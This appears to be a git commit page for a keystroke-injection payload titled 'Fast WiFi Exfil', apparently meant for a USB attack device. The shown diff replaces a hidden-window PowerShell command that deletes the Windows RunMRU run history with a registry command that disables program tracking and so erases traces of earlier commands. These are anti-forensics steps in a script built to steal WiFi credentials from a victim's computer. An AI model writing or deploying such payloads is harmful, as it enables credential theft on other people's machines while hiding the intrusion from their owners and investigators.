Update Fast WiFi Exfil (Powershell - No RunMRU History)

- Removed PowerShell command that clears RunMRU history.

+ Added efficient method that disables the RunMRU history, which also conveniently removes all previous ran commands/logs.
pull/178/head
0x00 2023-06-12 23:03:31 +00:00 committed by GitHub
parent 902b28252e
commit 8fd55617b8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -11,7 +11,7 @@ ENTER
DELAY 100
GUI r
DELAY 200
STRING powershell -w h -ep bypass Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU -Name * -ErrorAction SilentlyContinue
STRING reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
ENTER
DELAY 100
EXIT